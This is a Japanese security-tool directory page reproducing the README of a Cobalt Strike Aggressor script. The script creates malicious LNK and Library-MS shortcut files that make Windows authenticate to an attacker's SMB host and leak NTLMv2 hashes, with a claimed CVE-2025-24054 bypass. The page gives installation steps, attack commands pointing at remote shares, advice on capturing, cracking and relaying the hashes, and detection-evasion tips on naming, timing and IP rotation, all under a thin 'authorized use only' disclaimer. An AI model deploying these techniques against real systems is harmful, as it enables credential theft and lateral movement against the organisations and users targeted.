Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-50154-Aggressor-Script — Cobalt Strike Aggressorスクリプト。LNKおよびLibrary-MSファイルを武器化してSMB NTLMv2ハッシュ開示をトリガーし、CVE-2025-24054バイパスを含む、認可されたレッドチーム運用向けです。 | Kitploit
ツール/GitHubGitHub/ash1996x/cve-2025-50154-aggressor-script
パスワードクラッキングフィッシングツールエクスプロイトフレームワークペイロード生成横移動情報収集ポストエクスプロイトCTFペネトレーションテスト

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
コマンド&コントロール
学習と教育
レッドチーミング
GitHubash1996x/cve-2025-50154-aggressor-script

CVE-2025-50154-Aggressor-Script

Cobalt Strike Aggressorスクリプト。LNKおよびLibrary-MSファイルを武器化してSMB NTLMv2ハッシュ開示をトリガーし、CVE-2025-24054バイパスを含む、認可されたレッドチーム運用向けです。

リポジトリを見る
1260年前未レビュー

LNK Weaponizer - Cobalt Strike Aggressor スクリプト

SMB NTLMv2-SSP ハッシュ漏洩のための悪意のある LNK ファイルおよび Library-MS ファイルを武器化し実行する、包括的な Cobalt Strike Aggressor スクリプトです。CVE-2025-24054 バイパス技術を含みます。

⚠️ 免責事項

このツールは教育および研究目的のみに提供されています。作者は本コードの誤用に対して一切の責任を負いません。所有しているシステム、または明示的なテスト許可を得ているシステムでのみ使用してください。

NTLM ハッシュのキャプチャ

このスクリプトは、開かれたときにオペレーターのホストへの SMB 認証をトリガーする、武器化された .lnk および .library-ms ファイルを生成します。
漏洩した NTLMv2 ハッシュは Cobalt Strike には表示されません。攻撃者システム上で動作している Responder、Impacket の ntlmrelayx.py、または Inveigh などの外部ツールでキャプチャする必要があります。
収集されたハッシュは、Hashcat でクラックするか、さらなる横移動のためにリレーすることができます。

🎯 機能

  • LNK ファイルの武器化: NTLM ハッシュキャプチャ用の悪意のあるショートカットファイルを作成
  • Library-MS ファイルの作成: CVE-2025-24054 バイパス技術を実装
  • 右クリックメニュー統合: Cobalt Strike のビーコンコンテキストメニューから簡単にアクセス
  • コマンドラインインターフェース: 自動化とスクリプト化のための直接コマンド
  • 対話型ダイアログ: ユーザーフレンドリーなパラメータ入力
  • 迅速な展開: 事前設定された設定での迅速な展開
  • グローバル設定: デフォルト設定の簡単なカスタマイズ

📁 プロジェクト構造

root@kitploit:~
cobalt-strike-aggressor/
├── lnk_weaponizer.cna           # Main Aggressor script (v2.0)
├── standalone_lnk_weaponizer.ps1 # Standalone PowerShell version
├── README.md                    # This documentation
├── INSTALL.md                   # Installation and setup guide
└── examples/
    ├── usage_scenarios.md       # Practical usage examples
    └── sample_targets.csv       # Sample batch operation file

🚀 インストール

  1. lnk_weaponizer.cna を Cobalt Strike Aggressor スクリプトディレクトリにコピー
  2. Cobalt Strike でスクリプトをロード:
    • Cobalt Strike → Script Manager に移動
    • Load をクリックし、lnk_weaponizer.cna を選択
  3. スクリプトは自動的に初期化され、利用可能なコマンドを表示します

📖 使用方法

右クリックメニューオプション

Cobalt Strike の任意のビーコンを右クリックしてアクセス:

  1. LNK ファイルの作成: カスタム LNK 作成のための対話型ダイアログ
  2. Library-MS ファイルの作成: Library-MS 作成のための対話型ダイアログ (CVE-2025-24054 バイパス)
  3. クイック LNK (デフォルト設定): プリセット値による高速 LNK 展開
  4. クイック Library-MS (デフォルト設定): プリセット値による高速 Library-MS 展開

コマンドラインコマンド

LNK ファイルコマンド

root@kitploit:~
# Create LNK file with custom parameters
lnk_create <path> <ip> <share> <file>

# Example
lnk_create C:\Temp 192.168.1.10 share payload.exe

Library-MS ファイルコマンド

root@kitploit:~
# Create Library-MS file with custom parameters
library_create <path> <ip> <share>

# Example
library_create C:\Temp 10.10.14.22 share

クイックコマンド

root@kitploit:~
# Use default settings
lnk_quick
library_quick

# Show help
lnk_help

🔧 設定

デフォルト設定

スクリプトは以下の設定可能なデフォルト値を使用します:

  • IP: 192.168.1.10
  • Share: share
  • Path: C:\Temp

デフォルトのカスタマイズ

lnk_weaponizer.cna 内のグローバル変数を編集:

root@kitploit:~
global('$default_ip $default_share $default_path');
$default_ip = "192.168.1.10";
$default_share = "share";
$default_path = "C:\\Temp";

🎯 動作の仕組み

LNK ファイル技術

  1. PowerShell スクリプト生成: 悪意のある LNK ファイルを生成する PowerShell スクリプトを作成
  2. LNK ファイル作成: Windows Shell COM オブジェクトを使用して、リモート SMB ロケーションを指すショートカットを作成
  3. アイコンのトリガー: Explorer にリモートバイナリから PE アイコンを強制的にフェッチさせ、NTLM 認証をトリガー
  4. ハッシュキャプチャ: ユーザーがファイルを操作すると NTLMv2-SSP ハッシュがキャプチャされる

Library-MS 技術 (CVE-2025-24054 バイパス)

  1. XML 生成: UNC パス参照を含む Library-MS XML ファイルを作成
  2. ファイル作成: ターゲットディレクトリに .library-ms ファイルを生成
  3. ユーザー操作: ユーザーが Library-MS ファイルをダブルクリックすると、Windows が UNC パスにアクセスしようとする
  4. 認証トリガー: SMB 認証がトリガーされ、NTLM ハッシュがキャプチャされる

技術的詳細

両方の手法は以下のファイルを作成します:

  • リモート SMB ロケーションを指す
  • アクセス時に認証をトリガーする
  • 一般的なセキュリティ制御をバイパスする
  • 信頼性の高いハッシュキャプチャを提供する

📊 出力形式

スクリプトは詳細なログを提供します:

root@kitploit:~
[+] Creating LNK file on TARGET-COMPUTER
[+] Target UNC: \\192.168.1.10\share\payload.exe
[+] Local Path: C:\Temp
[+] LNK weaponization completed
[!] Wait for user to click the LNK file to capture NTLM hash

🛡️ セキュリティ上の考慮事項

検出回避

  • 正当に見える共有名とパスを使用する
  • 検出を避けるために展開のタイミングを考慮する
  • セキュリティツールのアラートを監視する
  • Library-MS 技術は追加の回避を提供する

運用セキュリティ

  • ハッシュ収集には専用の SMB サーバーを使用する
  • 適切なログ記録と監視を実装する
  • 組織のレッドチーム手順に従う
  • すべてのテスト活動を文書化する

法的コンプライアンス

  • テスト前に適切な承認を得る
  • すべてのテスト活動を文書化する
  • 範囲と境界を尊重する

🔍 トラブルシューティング

よくある問題

  1. ビーコンが見つからない

    • 対象コンピュータにアクティブなビーコンがあることを確認
    • バッチ操作でコンピュータ名のスペルを確認
  2. アクセス許可が拒否された

    • ターゲットパスへの書き込み権限を確認
    • 対象システムの UAC 設定を確認
  3. PowerShell 実行ポリシー

    • スクリプトは bpowershell() を使用して制限を処理
    • 対象に PowerShell が利用可能であることを確認

デバッグモード

スクリプトを変更して詳細出力を有効にする:

root@kitploit:~
# Add debug logging
blog($bid, "[DEBUG] Executing command: " . $command);

📝 使用例

シナリオ 1: LNK ファイルの展開

root@kitploit:~
# Create LNK file on specific target
lnk_create C:\Users\Public\Desktop 10.0.0.5 public malware.exe

シナリオ 2: Library-MS バイパス

root@kitploit:~
# Create Library-MS file for CVE-2025-24054 bypass
library_create C:\Users\Public\Desktop 192.168.1.100 share

シナリオ 3: クイック攻撃

root@kitploit:~
# Use default settings for rapid deployment
lnk_quick
library_quick

🔬 高度な技術

CVE-2025-24054 バイパス

Library-MS 技術は以下の方法で CVE-2025-24054 のバイパスを実装します:

  • 従来の LNK ファイルの代わりに Library-MS ファイル形式を使用
  • 認証トリガーに Windows ライブラリシステムを活用
  • 追加の回避機能を提供

回避戦略

  • ファイル名: 現実的な名前と拡張子を使用
  • パスの選択: 一般的なユーザーディレクトリに展開
  • タイミング: 通常の業務時間内に実行
  • ローテーション: SMB サーバーの IP と共有名を変更

🤝 コントリビューション

  1. リポジトリをフォーク
  2. 機能ブランチを作成
  3. 変更を加える
  4. 十分にテスト
  5. プルリクエストを送信

📄 ライセンス

このプロジェクトは教育目的で現状のまま提供されています。責任を持って、適用される法律および規制に従って使用してください。

🙏 謝辞

  • Aggressor フレームワークを提供してくれた Cobalt Strike チーム
  • テストとフィードバックを提供してくれたレッドチームコミュニティ
  • LNK ベースの攻撃を先駆けたセキュリティ研究者
  • CVE-2025-24054 研究への貢献者

注意: どのシステムでもテストする前に必ず適切な許可を得てください。

ツールをダウンロード